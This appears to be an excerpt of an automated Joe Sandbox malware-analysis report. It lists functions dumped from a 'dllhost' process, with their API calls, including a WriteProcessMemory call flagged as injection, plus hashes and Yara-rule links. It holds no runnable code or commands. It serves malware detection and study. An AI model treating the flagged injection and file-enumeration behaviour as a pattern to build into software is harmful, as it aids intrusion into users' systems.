Instruction ID: 5ebf98a9318d1cf11a6e2bd8e2011da994fb823dd55f09a9b8ba704af8656aa7
Opcode Fuzzy Hash: 484a6d641e587dcf4bfaf19336bd6aaa4718204073649a06c8fcc805006d2d9b
Instruction Fuzzy Hash: A411E1715093809FDB128F25DC84B52FFB4EF06220F0880DBED858B2A3D264A948CB62

Function 0082A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082A935

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4a7b15f5069c0b08202e9f3f1d77d26570d05589138e445f82f605d5758641b4
Instruction ID: afe78e86194c903750cb1e2d78ccf3b7329968b180567d333b2013af4011a150
Opcode Fuzzy Hash: 4a7b15f5069c0b08202e9f3f1d77d26570d05589138e445f82f605d5758641b4
Instruction Fuzzy Hash: 5401C479504204AFE7208F16DC85BAAFB9CEF44724F15809AEE449B251D374A9848AB2

Function 0082A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0082A1C2

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 39c1227e3f7dcea17f9ee9eb52e7f3ce71a2f589df01fa432c6e5d7e6e5eca5d
Instruction ID: 1c75c8221e4e7b75941e11fbdc098089ab00d4a99db42283113aa2884b45f03e
Opcode Fuzzy Hash: 39c1227e3f7dcea17f9ee9eb52e7f3ce71a2f589df01fa432c6e5d7e6e5eca5d
Instruction Fuzzy Hash: 5E017171500200AFD350DF16DC85B76FBE8EB88A20F14856AED089B751D735B915CBE6

Function 0082A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0082A608

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0b378caced236d4b9988c313456b4a641b21c3f4e1bae8e02f1ccc9f2d12db59
Instruction ID: a0215de5b6f9e1616036dba731844315650405f19e96891bea561b864bc047aa
Opcode Fuzzy Hash: 0b378caced236d4b9988c313456b4a641b21c3f4e1bae8e02f1ccc9f2d12db59
Instruction Fuzzy Hash: 8C01C035400200DFEB20CF15E884B62FBE4FF14710F0C809AEE458B262C331E898CE62

Function 0082ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0082ACE0

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9e7332346764b0d5c4fe6b60416d7ed072541442cd7cc79de9746a03d5fde3e7
Instruction ID: 2144f760be688f3daac3310a384211b7d9312ad019af1e95bcd6cee5f1394694
Opcode Fuzzy Hash: 9e7332346764b0d5c4fe6b60416d7ed072541442cd7cc79de9746a03d5fde3e7
Instruction Fuzzy Hash: 9901F4355042448FEB208F15E985761FBE4EF04325F08C0AADD098B752D375E858CEA3

Function 0082AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0082ADA1

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 7b1304f1f11eb34c2a03edb1a6d0cd853dff120496214507c6d39b5fa432d5e8
Instruction ID: 00f953d4aac9035f73c153ede794e46d289d0d41f361c52a5c65c2fbaff87fcd
Opcode Fuzzy Hash: 7b1304f1f11eb34c2a03edb1a6d0cd853dff120496214507c6d39b5fa432d5e8
Instruction Fuzzy Hash: FB01F4714042448FEB10CF15E985796FBE4EF04725F08C8AADD09CF652D375A844CBA3

Function 0082A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0082A6A8

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3587bd501b6e79596619e94705b1776adcfd44c803f3e010cfcd516e70264941
Instruction ID: a02ac2d17c4f2a4d012aa500c3d5f3d4b68a408feb452162c7ff972368873c89
Opcode Fuzzy Hash: 3587bd501b6e79596619e94705b1776adcfd44c803f3e010cfcd516e70264941
Instruction Fuzzy Hash: 40F0AF744046449FEB208F16E989761FBE4EF14724F1CC49ADE098B362D375E854CEA3

Function 009D07C7 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

2, xrefs: 009D07FD

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 3f239df6d03379356e46fe1fc29f7554d369993083e934dbf5316b6fbd429375
Instruction ID: 8e6b8d1a96a8249961364ce619f3db09f263b5456a0964f2a16924a0f3ed6628
Opcode Fuzzy Hash: 3f239df6d03379356e46fe1fc29f7554d369993083e934dbf5316b6fbd429375
Instruction Fuzzy Hash: FF616C20A8E7C54FCB028B30997B7C8BF70AE13125B1885DFC88A5F687D218585AD726

Function 0082B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082B468

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b987f6b7f6a632d4b165b139446fe3eca2c0820d09d0df97d96ccdc579dcfd20
Instruction ID: f77c75532e9826b1e926c428c7cb9e0b1c4572cd80ac0457a13fe2982831fa42
Opcode Fuzzy Hash: b987f6b7f6a632d4b165b139446fe3eca2c0820d09d0df97d96ccdc579dcfd20
Instruction Fuzzy Hash: B221A1725093C05FDB128B25DC94792BFB4EF47724F0984DBEC858F263D265A908CB62

Function 0082A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082A414

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7a2a01079294b728eb289be1d0047032da4c7539b1b730d7c744672bd227ef53
Instruction ID: 154747792319a91f2a1ca7b59c1c2474edf0154c3fc1dcec3f160bbecc453b81
Opcode Fuzzy Hash: 7a2a01079294b728eb289be1d0047032da4c7539b1b730d7c744672bd227ef53
Instruction Fuzzy Hash: 7F11A3715093809FDB128F25DC94B52BFB8EF46220F0884DBED89CF653D275A858CB62

Function 0082B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082B468

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2518ffb7e0237dcb4e91818cec3be8ab5bf5780b93f1480fa180495e500974f2
Instruction ID: 37e7d268ff5f319babfaf351d04d49b420e36425e2b52914d843f9886b858c07
Opcode Fuzzy Hash: 2518ffb7e0237dcb4e91818cec3be8ab5bf5780b93f1480fa180495e500974f2
Instruction Fuzzy Hash: 6601DF719052408FEB10DF19E985792FBE4EF40724F08C4ABDD49CF252D375E854CAA2

Function 0082A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082A414

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 04e4a3be8d348c071226ae8fe409b1819a48aa4a163504e007da3196b81ffe7d
Instruction ID: ac151153d73b4fb5f891e2094d077fdf715eee8194535cce7b29bf91f219adad
Opcode Fuzzy Hash: 04e4a3be8d348c071226ae8fe409b1819a48aa4a163504e007da3196b81ffe7d
Instruction Fuzzy Hash: 5701DF759042409FEB109F25E8897A6FBE4EF00724F08C4ABDD09CF252D2B5E854CAA2

Function 00996CF8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 00996D0D

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: 3f8bea647130c8b242d5865b53188133ffd8bf44b657f2d822f77483e3a3682d
Instruction ID: be59449c9c8dc151aed7bff7be0f3d7e2e5d0c9bb121de1b2df8ccc9031b0158
Opcode Fuzzy Hash: 3f8bea647130c8b242d5865b53188133ffd8bf44b657f2d822f77483e3a3682d
Instruction Fuzzy Hash: 25F0AF30A083448FCB06DF79A91A5A67BB6FF8660070580A5D849CB3B5EF784E15C762

Function 009910DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0099392A

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 92f76fc9532da08f7713bcd89a2d64c4a99cbc3131ece96634ad4ef90de2f3c4
Instruction ID: 1dcb0fb926256d39531196dfaf77d934f1b9e9ad59487dd58cd21654f752efd5
Opcode Fuzzy Hash: 92f76fc9532da08f7713bcd89a2d64c4a99cbc3131ece96634ad4ef90de2f3c4
Instruction Fuzzy Hash: 8FF0C231A0C2A4DBEF514F6C88183AD77A8AB56360F1940A6CC0ADF291D7798D41DBE7

Function 009D0295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 009D02C3

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: c7dbca65f4c2f7e5865bf5291fd7a7527bcfa52ffb2e460d056f88c681a4b212
Instruction ID: 566055864a9fc7f9fe6997af3892b9edf9c885420f82335e2cce4e2fcff8bdcd
Opcode Fuzzy Hash: c7dbca65f4c2f7e5865bf5291fd7a7527bcfa52ffb2e460d056f88c681a4b212
Instruction Fuzzy Hash: 93E04670E49248CBDF04DFB9D91839DB7B2AFD4300F60C826D016DA344EB788A448B01

Function 009D010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 009D0136

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 16956b6c4d814c1c899bb213a88d06dd980b9c40e44ab3e4c3475175bf21aced
Instruction ID: 42853c1eff27a091409954fe2148be2bd27648f66f920fc2eb3c901b172eec58
Opcode Fuzzy Hash: 16956b6c4d814c1c899bb213a88d06dd980b9c40e44ab3e4c3475175bf21aced
Instruction Fuzzy Hash: 8AE04634E49206CBDF04DFB4991839D77B2BBD0340F50C826E406DA345DB388A448A05

Function 00990372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 009956AC

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: e94c66fecb3b8756e6ef8fb2e252941f62ccfcf5eddebf94840e76707404ce30
Instruction ID: f15407b7de220977abde037e43b88b1a4d7ba2d70fbd4879f55c9b46ea97ae86
Opcode Fuzzy Hash: e94c66fecb3b8756e6ef8fb2e252941f62ccfcf5eddebf94840e76707404ce30
Instruction Fuzzy Hash: 85E086B19085A5DFEB516F1C981534C37D4AB05360F1544D7D8019B242C6790E419F46

Function 009D09AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 009D09C6

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 8bcc7100b3d849282b63e0fef709ac268944ca7475fffe6460d84ef717cc8c12
Instruction ID: 2791443c1646a96b29ddb103fd31f036b8adb1fad482a7767ed28fcd3253bc9f
Opcode Fuzzy Hash: 8bcc7100b3d849282b63e0fef709ac268944ca7475fffe6460d84ef717cc8c12
Instruction Fuzzy Hash: 25E0B638A49205CBDF44DBA4D91839E77B5ABE5305F508816E502DA345DA788A849A06

Function 009D037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 009D03A3

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 536c5f70dbded2e41c367e182353d17a17a10812cdf581ae215ed4e9a62fccae
Instruction ID: a189351cf94e10614180a6240060c0735cb4b3bb95ac23fc6a69e67aa323c0d9
Opcode Fuzzy Hash: 536c5f70dbded2e41c367e182353d17a17a10812cdf581ae215ed4e9a62fccae
Instruction Fuzzy Hash: 0FD0A930E053818BDB429B70992A38C3BF1AF81340F94C85AD0869F382CE780A194B81

Function 009D0639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 009D065E

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 2fc5fa2e0d7c418d246e7cef5188077bbeba89324124e3fce959eda702d02f34
Instruction ID: 51d3b431b16d4ccaeb5ed2fea3894d2ff04e18a135d9a0760e06e2d74040a357
Opcode Fuzzy Hash: 2fc5fa2e0d7c418d246e7cef5188077bbeba89324124e3fce959eda702d02f34
Instruction Fuzzy Hash: E5D0A73080B3468FCF01DB74841A3987FF0AF87310F5049D28092CB2A3DE38491D9700

Function 009D0222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 009D0237

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ad6ff07509aa8e01907e0f874778e0a512c7950c389ead9345938a7c9f69d04a
Instruction ID: cf64a410307c593f591980ffe6ebdff6b91590f56ed00c2a7f1b05d383ccd377
Opcode Fuzzy Hash: ad6ff07509aa8e01907e0f874778e0a512c7950c389ead9345938a7c9f69d04a
Instruction Fuzzy Hash: 1AD0C934E4A308CBDF44DFA4D5583AD77F2EBD5300FA0882AD002DB395CA388E589B41

Function 009D08DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 009D08F4

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 9cf2ecef5e72c5c2311eac96634d71c2c110c88eeee8c08fdc5d4eacace01cf1
Instruction ID: 15e2b65169c1e56fd8b75efde2b54d3c0f3f94ae7ab28d5048c51d293525d0ce
Opcode Fuzzy Hash: 9cf2ecef5e72c5c2311eac96634d71c2c110c88eeee8c08fdc5d4eacace01cf1
Instruction Fuzzy Hash: E9C04C70A46204CBEF44ABB4951979C76B5ABD4300F508859950A9A386DA7C4B048B45

Function 009D0415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 009D042A

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 56ba73a0d8b8e6cc4a1fd0fea659ad151187ae77c5273e68a9e66c7e152090e2
Instruction ID: 6d800fc3e637947a90f8e8ea8573a63aa6382d598b6d2cc34b9b0820da610698
Opcode Fuzzy Hash: 56ba73a0d8b8e6cc4a1fd0fea659ad151187ae77c5273e68a9e66c7e152090e2
Instruction Fuzzy Hash: BFC04C74E05244CBEF549BB4952879C76B1ABD4301F50C81995129B386DA7845044F41

Function 009D04C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 009D04DE

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 43039c5b362a23ad7aad1f6bf9217e45285c1b5a550ffb6a72cc7c1ca359dac6
Instruction ID: 6bf044c7b8440b2fe3c643e71453827c0e5d2aeac3f1a5f9b0577b3da8a68ae3
Opcode Fuzzy Hash: 43039c5b362a23ad7aad1f6bf9217e45285c1b5a550ffb6a72cc7c1ca359dac6
Instruction Fuzzy Hash: 44C04C70E05204CBDF449BB4951839D76B5ABD4341F508819A516AB385DA784604CF41

Function 009D0500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 009D0515

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: d6abbd2071ead172d18a5808ce09bceae5dfe38ba0a9752b8f82cd71af3d32c6
Instruction ID: a424e22f516d8316d1406f1b07d45b379cb32c57d658027e0edfd899f9a1faed
Opcode Fuzzy Hash: d6abbd2071ead172d18a5808ce09bceae5dfe38ba0a9752b8f82cd71af3d32c6
Instruction Fuzzy Hash: C1C04C70E062048BDF44DBB4951839D76B5ABD4344F60482965029B385DA794B14CB41

Function 009D0340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 009D0358

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 7a2c1269fd87712df194169bd9919938e80124f0fafa312cc567d283486908a7
Instruction ID: 652272e04c85ac3e32c5e0c7247b38c8b1bac260a404259ba4efc42962fd64be
Opcode Fuzzy Hash: 7a2c1269fd87712df194169bd9919938e80124f0fafa312cc567d283486908a7
Instruction Fuzzy Hash: 5DC04C70A062048BDF94DFB4951939C76F5ABD5341F508859900A9A395DE784A448B41

Function 009D08B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 009D08D0

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 8c57a1afffbddeb9b4dcddb13158c55830596d850ff874e25f514cde246f4124
Instruction ID: e81b6aa29561dd925186ebb48e20b946ab468cca4372335333bd961dc5cebd56
Opcode Fuzzy Hash: 8c57a1afffbddeb9b4dcddb13158c55830596d850ff874e25f514cde246f4124
Instruction Fuzzy Hash: 10C04C70A05204CBDF449BB4991879C76B1ABD4301F50885951469B385DE7C4A549F55

Function 009D0436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 009D044E

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: f9ddd390b9488a0c5edaedeed6bdd811af362e406aa6366409302354761fffe2
Instruction ID: 58979d7d810197ba6bf18796a6300a20d1bab2627997f495194fd9cf01338762
Opcode Fuzzy Hash: f9ddd390b9488a0c5edaedeed6bdd811af362e406aa6366409302354761fffe2
Instruction Fuzzy Hash: ADC04C70E05204CBEF449BB4992D39C76F5ABD4301F5088599006AA386DA784A044F51

Function 009D03AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 009D03C4

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 489388b44176f113f4b76c8b2c89abc0522a6da42ee736b1b94f89161fc9c57e
Instruction ID: 6fb252c3099215c715aa82861ee09a2f108750d70c5013db9f3e7ec27d0f5f2d
Opcode Fuzzy Hash: 489388b44176f113f4b76c8b2c89abc0522a6da42ee736b1b94f89161fc9c57e
Instruction Fuzzy Hash: 5DC04C70A053048BDF449BB499183AC76B5AFD5301F50892D50029B386DF7849149B41

Function 0099F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff509edc653e2c2de245407cc7cee8d90f4ee6d9bed17d469a0fea320ae8f5a8
Instruction ID: ff0610fd56c79e041924e72bc8f70d8bfa97390cf63c9435982aa85846a1b064
Opcode Fuzzy Hash: ff509edc653e2c2de245407cc7cee8d90f4ee6d9bed17d469a0fea320ae8f5a8
Instruction Fuzzy Hash: AC210A74A04306DBDF04EFA8E9193ADB7F5FF80348F208869E505D7250EB789A44DB52

Function 00B805E7 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3335021747.0000000000B80000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_b80000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beaddcf18ce4bdd97fb584aaf7c848128b3048b59b30d466462b0dff7df90c37
Instruction ID: b45f12636d69b2e0128d390d2b1433d3cd73cd59686e376cda83dce908f5775e
Opcode Fuzzy Hash: beaddcf18ce4bdd97fb584aaf7c848128b3048b59b30d466462b0dff7df90c37
Instruction Fuzzy Hash: F6F0A4B65093806FD7118F06AC40862FFE8EB86620709C09FEC4D8B652D225A908CB72

Function 00990006 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6efc775627f8b2f947ed70a383f0e61c03dbad2b58d1909fec5397ce3c2b703
Instruction ID: f47d861069f95cf18918c6f4d95a06b21c637a37a14d4f813e87913fec5d64fd
Opcode Fuzzy Hash: e6efc775627f8b2f947ed70a383f0e61c03dbad2b58d1909fec5397ce3c2b703
Instruction Fuzzy Hash: 0A014C6008E7C59FC75387304939660BF702E83219B2A82CBD480CF1A3D22E5A8AD767

Function 00996D38 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f455935ae8cf52d931a602c39904f2c35562ddb04c5dc78394b8778bcf23b1c
Instruction ID: 55708443fd9b2fa12ca2c500af8703bf5c0dd446e7d9c0001010d1394325d1a4
Opcode Fuzzy Hash: 9f455935ae8cf52d931a602c39904f2c35562ddb04c5dc78394b8778bcf23b1c
Instruction Fuzzy Hash: F6F082306053449FDB124B64AC092A57F78FF86B01F004595D9058B3A1DF795E048362

Function 0099206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6912c5abaacc37988f30f5b5d0c7fcdba4bafaa50b7169914e29b01492f57b
Instruction ID: 0b5926a67a7974f7a124732c77a0ef61e0427d80645b1d7cff54964ab02d975e
Opcode Fuzzy Hash: 6a6912c5abaacc37988f30f5b5d0c7fcdba4bafaa50b7169914e29b01492f57b
Instruction Fuzzy Hash: D9F04974A08615CBDF549F28D89876CBBB1BBC5311F14C8A5D84693390CE758F84CF80

Function 00991704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c532c63d4635843102093c5a02016b2aa36301e96e75dcbb3e4821f56982312
Instruction ID: 568057d0175333eb50f52a6d434fa42fc041e10ca203869b641d1fd3d56d238f
Opcode Fuzzy Hash: 5c532c63d4635843102093c5a02016b2aa36301e96e75dcbb3e4821f56982312
Instruction Fuzzy Hash: 94F06DB4A05155CBDF548F38DD583ACBBB1BBC9310F0488A5E90AD6290CF748E44CF40

Function 00B80606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

